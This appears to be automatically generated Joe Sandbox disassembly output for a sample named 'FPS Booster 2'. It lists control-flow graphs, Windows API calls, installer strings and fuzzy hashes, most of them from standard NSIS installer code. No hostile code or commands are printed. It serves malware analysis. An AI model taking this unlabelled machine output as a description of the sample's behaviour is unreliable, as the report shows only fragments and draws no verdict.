                                                control_flow_graph 927 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 930 403603-403608 927->930 931 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 927->931 932 4037e2-4037e6 930->932 939 403641 931->939 940 403728-403736 call 4032d2 931->940 942 403646-40365d 939->942 946 4037f1-4037f6 940->946 947 40373c-40373f 940->947 944 403661-403663 call 403336 942->944 945 40365f 942->945 951 403668-40366a 944->951 945->944 946->932 949 403741-403752 call 403368 call 403336 947->949 950 40376b-403795 GlobalAlloc call 403368 call 40337f 947->950 971 403757-403759 949->971 950->946 976 403797-4037a8 950->976 954 403670-403677 951->954 955 4037e9-4037f0 call 4032d2 951->955 959 4036f3-4036f7 954->959 960 403679-40368d call 405e38 954->960 955->946 964 403701-403707 959->964 965 4036f9-403700 call 4032d2 959->965 960->964 974 40368f-403696 960->974 967 403716-403720 964->967 968 403709-403713 call 4072ad 964->968 965->964 967->942 975 403726 967->975 968->967 971->946 977 40375f-403765 971->977 974->964 980 403698-40369f 974->980 975->940 981 4037b0-4037b3 976->981 982 4037aa 976->982 977->946 977->950 980->964 983 4036a1-4036a8 980->983 984 4037b6-4037be 981->984 982->981 983->964 985 4036aa-4036b1 983->985 984->984 986 4037c0-4037db SetFilePointer call 405e38 984->986 985->964 987 4036b3-4036d3 985->987 990 4037e0 986->990 987->946 989 4036d9-4036dd 987->989 991 4036e5-4036ed 989->991 992 4036df-4036e3 989->992 990->932 991->964 993 4036ef-4036f1 991->993 992->975 992->991 993->964
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                Strings
                                                • Inst, xrefs: 00403698
                                                • Error launching installer, xrefs: 00403603
                                                • Null, xrefs: 004036AA
                                                • soft, xrefs: 004036A1
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 4283519449-527102705
                                                • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 994 40337f-403398 995 4033a1-4033a9 994->995 996 40339a 994->996 997 4033b2-4033b7 995->997 998 4033ab 995->998 996->995 999 4033c7-4033d4 call 403336 997->999 1000 4033b9-4033c2 call 403368 997->1000 998->997 1004 4033d6 999->1004 1005 4033de-4033e5 999->1005 1000->999 1006 4033d8-4033d9 1004->1006 1007 403546-403548 1005->1007 1008 4033eb-403432 GetTickCount 1005->1008 1011 403567-40356b 1006->1011 1009 40354a-40354d 1007->1009 1010 4035ac-4035af 1007->1010 1012 403564 1008->1012 1013 403438-403440 1008->1013 1014 403552-40355b call 403336 1009->1014 1015 40354f 1009->1015 1016 4035b1 1010->1016 1017 40356e-403574 1010->1017 1012->1011 1018 403442 1013->1018 1019 403445-403453 call 403336 1013->1019 1014->1004 1027 403561 1014->1027 1015->1014 1016->1012 1022 403576 1017->1022 1023 403579-403587 call 403336 1017->1023 1018->1019 1019->1004 1028 403455-40345e 1019->1028 1022->1023 1023->1004 1031 40358d-40359f WriteFile 1023->1031 1027->1012 1030 403464-403484 call 4076a0 1028->1030 1037 403538-40353a 1030->1037 1038 40348a-40349d GetTickCount 1030->1038 1032 4035a1-4035a4 1031->1032 1033 40353f-403541 1031->1033 1032->1033 1035 4035a6-4035a9 1032->1035 1033->1006 1035->1010 1037->1006 1039 4034e8-4034ec 1038->1039 1040 40349f-4034a7 1038->1040 1043 40352d-403530 1039->1043 1044 4034ee-4034f1 1039->1044 1041 4034a9-4034ad 1040->1041 1042 4034af-4034e5 MulDiv wsprintfW call 404f9e 1040->1042 1041->1039 1041->1042 1042->1039 1043->1013 1048 403536 1043->1048 1046 403513-40351e 1044->1046 1047 4034f3-403507 WriteFile 1044->1047 1051 403521-403525 1046->1051 1047->1033 1050 403509-40350c 1047->1050 1048->1012 1050->1033 1052 40350e-403511 1050->1052 1051->1030 1053 40352b 1051->1053 1052->1051 1053->1012
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                • GetTickCount.KERNEL32 ref: 00403492
                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                • wsprintfW.USER32 ref: 004034CE
                                                • WriteFile.KERNELBASE(00000000,00000000,00426D70,00403792,00000000), ref: 004034FF
                                                • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CountFileTickWrite$wsprintf
                                                • String ID: (]C$... %d%%$pAB$pmB
                                                • API String ID: 651206458-1316446892
                                                • Opcode ID: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                • Opcode Fuzzy Hash: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                Function 6FFB1791 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetDlgItem.USER32(?,00000000), ref: 6FFB17D8
                                                • GetWindowRect.USER32(00000000,?), ref: 6FFB17E3
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 6FFB17F3
                                                • CreateDialogParamW.USER32(00000001,?,6FFB14FC,00000000), ref: 6FFB1808
                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014), ref: 6FFB183B
                                                • SetWindowLongW.USER32(?,00000004,6FFB142D), ref: 6FFB1849
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 6FFB1863
                                                • HeapAlloc.KERNEL32(00000000), ref: 6FFB186A
                                                  • Part of subcall function 6FFB1E83: GlobalAlloc.KERNELBASE(00000040,?,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1E99
                                                  • Part of subcall function 6FFB1E83: lstrcpynW.KERNEL32(00000004,00000104,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1EAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Window$AllocHeap$CreateDialogGlobalItemLongParamPointsProcessRectlstrcpyn
                                                • String ID: error
                                                • API String ID: 1928716940-1574812785
                                                • Opcode ID: 588f22a66060cd0ad16021208abaed04c10e3ce97eb2e8b0d2d7f76a7d0b7a8e
                                                • Instruction ID: 3dd3985a9bae286674c8705e54a605b37a4a0be389e6d172a0a58bee8a537a1b
                                                • Opcode Fuzzy Hash: 588f22a66060cd0ad16021208abaed04c10e3ce97eb2e8b0d2d7f76a7d0b7a8e
                                                • Instruction Fuzzy Hash: C2211C71964614EFCF11EFA5D989F6E7F78FB4A3A4B00400DF60592360D731A520DB60
                                                Function 004023F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 83libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1064 4023f0-4023fd 1065 402403-402419 call 40145c * 2 1064->1065 1066 4024e5-4024f1 call 404f9e 1064->1066 1076 402429-402438 LoadLibraryExW 1065->1076 1077 40241b-402427 GetModuleHandleW 1065->1077 1072 4030e3-4030f2 1066->1072 1078 40243e-40244d call 406391 1076->1078 1079 4024ce-4024db call 404f9e 1076->1079 1077->1076 1077->1078 1084 40248c-4024a4 call 404f9e call 4062cf 1078->1084 1085 40244f-402455 1078->1085 1079->1066 1089 4024a7-4024aa 1084->1089 1087 402457-402463 call 401435 1085->1087 1088 40246e-40248a KiUserCallbackDispatcher 1085->1088 1087->1089 1100 402465-40246c 1087->1100 1088->1089 1089->1072 1093 4024b0-4024ba call 403ce4 1089->1093 1093->1072 1099 4024c0-4024c9 FreeLibrary 1093->1099 1099->1072 1100->1089
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040241C
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                • KiUserCallbackDispatcher.NTDLL(?,00002004,0047F000,0040C0E0,`G,?,?,?,00000008,00000001,000000F0), ref: 00402485
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                Strings
                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                • `G, xrefs: 0040246E
                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$Library$CallbackDispatcherFreeHandleLoadModuleTextUserWindowlstrcatwvsprintf
                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                • API String ID: 2832544771-4193110038
                                                • Opcode ID: 11ea408b33ed6810e24fd29753fd71f986e360d3f253baf971bc2a7019b5048c
                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                • Opcode Fuzzy Hash: 11ea408b33ed6810e24fd29753fd71f986e360d3f253baf971bc2a7019b5048c
                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                Function 6E9E28A3 Relevance: 13.6, APIs: 9, Instructions: 147memorystringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1101 6e9e28a3-6e9e28b7 1102 6e9e28bb-6e9e28d2 1101->1102 1103 6e9e28fe-6e9e2903 call 6e9e1592 1102->1103 1104 6e9e28d4-6e9e28d9 1102->1104 1107 6e9e2908 1103->1107 1104->1103 1106 6e9e28db-6e9e28de 1104->1106 1108 6e9e28e7-6e9e28e9 1106->1108 1109 6e9e28e0-6e9e28e5 call 6e9e15a3 1106->1109 1110 6e9e2909-6e9e2912 1107->1110 1112 6e9e28eb-6e9e28ee 1108->1112 1113 6e9e28f9-6e9e28fc 1108->1113 1109->1110 1114 6e9e2918 1110->1114 1115 6e9e2914-6e9e2916 1110->1115 1112->1113 1117 6e9e28f0-6e9e28f7 call 6e9e1628 1112->1117 1113->1110 1119 6e9e291a-6e9e2922 1114->1119 1115->1119 1117->1107 1121 6e9e2928-6e9e292b 1119->1121 1122 6e9e2a15 1119->1122 1124 6e9e2a0a-6e9e2a13 call 6e9e167f 1121->1124 1125 6e9e2931-6e9e2934 1121->1125 1123 6e9e2a18-6e9e2a24 GlobalFree 1122->1123 1126 6e9e2a49-6e9e2a4e 1123->1126 1127 6e9e2a26-6e9e2a34 1123->1127 1124->1123 1128 6e9e29fc-6e9e2a08 call 6e9e167f 1125->1128 1129 6e9e293a-6e9e293d 1125->1129 1131 6e9e2a36-6e9e2a3b 1127->1131 1132 6e9e2a40-6e9e2a44 1127->1132 1128->1123 1134 6e9e2943 1129->1134 1135 6e9e29d0-6e9e29f5 GlobalAlloc WideCharToMultiByte 1129->1135 1131->1102 1132->1102 1134->1123 1139 6e9e2949-6e9e294c 1134->1139 1137 6e9e29f8-6e9e29fa 1135->1137 1137->1123 1140 6e9e294e-6e9e2951 1139->1140 1141 6e9e297b-6e9e29ae GlobalAlloc lstrcpynW 1139->1141 1140->1123 1142 6e9e2957-6e9e2960 lstrlenW 1140->1142 1141->1137 1143 6e9e29b0-6e9e29ce GlobalAlloc CLSIDFromString GlobalFree 1141->1143 1142->1123 1144 6e9e2966-6e9e2976 call 6e9e167f call 6e9e2554 1142->1144 1143->1123 1144->1123
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 6E9E2958
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6E9E2985
                                                • lstrcpynW.KERNEL32(00000000,?), ref: 6E9E2998
                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6E9E29B4
                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 6E9E29C1
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E29C8
                                                • GlobalAlloc.KERNEL32(00000040), ref: 6E9E29D8
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E9E29EF
                                                • GlobalFree.KERNELBASE(00000000), ref: 6E9E2A19
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Alloc$Free$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                • String ID:
                                                • API String ID: 916651646-0
                                                • Opcode ID: 08d616eb5104f71b95d814dce19d5c1954683e1c7d4bd7a80a852a039cc8cc63
                                                • Instruction ID: 8f80906c007a3bec1c323196550e53ba38806787892137bd2b39f7fdc548891d
                                                • Opcode Fuzzy Hash: 08d616eb5104f71b95d814dce19d5c1954683e1c7d4bd7a80a852a039cc8cc63
                                                • Instruction Fuzzy Hash: 00418AB1508206AFE762CFA5C848A6A77FCFF46322B100D59E756E7991D730D444CF61
                                                Function 6FFB1C7C Relevance: 12.1, APIs: 8, Instructions: 51windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1149 6ffb1c7c-6ffb1cae SendMessageW ShowWindow 1150 6ffb1d01-6ffb1d14 SetWindowLongW 1149->1150 1151 6ffb1cb0-6ffb1cb1 1149->1151 1152 6ffb1cb7-6ffb1cd2 KiUserCallbackDispatcher IsDialogMessageW 1151->1152 1153 6ffb1cf8-6ffb1cfe 1152->1153 1154 6ffb1cd4-6ffb1ce2 IsDialogMessageW 1152->1154 1153->1152 1155 6ffb1d00 1153->1155 1154->1153 1156 6ffb1ce4-6ffb1cf2 TranslateMessage DispatchMessageW 1154->1156 1155->1150 1156->1153
                                                APIs
                                                • SendMessageW.USER32(?,0000040D,00000000), ref: 6FFB1C94
                                                • ShowWindow.USER32(00000008), ref: 6FFB1CA2
                                                • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 6FFB1CBE
                                                • IsDialogMessageW.USER32(?), ref: 6FFB1CCE
                                                • IsDialogMessageW.USER32(?), ref: 6FFB1CDE
                                                • TranslateMessage.USER32(?), ref: 6FFB1CE8
                                                • DispatchMessageW.USER32(?), ref: 6FFB1CF2
                                                • SetWindowLongW.USER32(?,00000004), ref: 6FFB1D0C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Message$DialogWindow$CallbackDispatchDispatcherLongSendShowTranslateUser
                                                • String ID:
                                                • API String ID: 4159918924-0
                                                • Opcode ID: cc74dcbc2237ee50e242f0708eab917acf32ddb5ca901f190785816f8e34a796
                                                • Instruction ID: e0f4434b581fe6902f0a6e55f69541b69a9f059c795a1c4cd2237c682c394268
                                                • Opcode Fuzzy Hash: cc74dcbc2237ee50e242f0708eab917acf32ddb5ca901f190785816f8e34a796
                                                • Instruction Fuzzy Hash: 5E115B72960909EBCF009FA1ED89F9A3F7EFF467A4B004025FA1191234E730A426CB60
                                                Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1157 401eb9-401ec4 1158 401f24-401f26 1157->1158 1159 401ec6-401ec9 1157->1159 1160 401f53-401f7b GlobalAlloc call 406831 1158->1160 1161 401f28-401f2a 1158->1161 1162 401ed5-401ee3 call 4062cf 1159->1162 1163 401ecb-401ecf 1159->1163 1178 4030e3-4030f2 1160->1178 1179 402387-40238d GlobalFree 1160->1179 1166 401f3c-401f4e call 406035 1161->1166 1167 401f2c-401f36 call 4062cf 1161->1167 1175 401ee4-402702 call 406831 1162->1175 1163->1159 1168 401ed1-401ed3 1163->1168 1166->1179 1167->1166 1168->1162 1169 401ef7-402e50 call 406035 * 3 1168->1169 1169->1178 1189 402708-40270e 1175->1189 1179->1178 1189->1178
                                                APIs
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FreeGloballstrcpyn
                                                • String ID: Exch: stack < %d elements$Pop: stack empty$Show
                                                • API String ID: 1459762280-1347343861
                                                • Opcode ID: dcf528aa7861a26f6c92768877dcdc2065be54f54d8d6e98b78a34fa813ca885
                                                • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                • Opcode Fuzzy Hash: dcf528aa7861a26f6c92768877dcdc2065be54f54d8d6e98b78a34fa813ca885
                                                • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 3376005127-0
                                                • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                • String ID:
                                                • API String ID: 2568930968-0
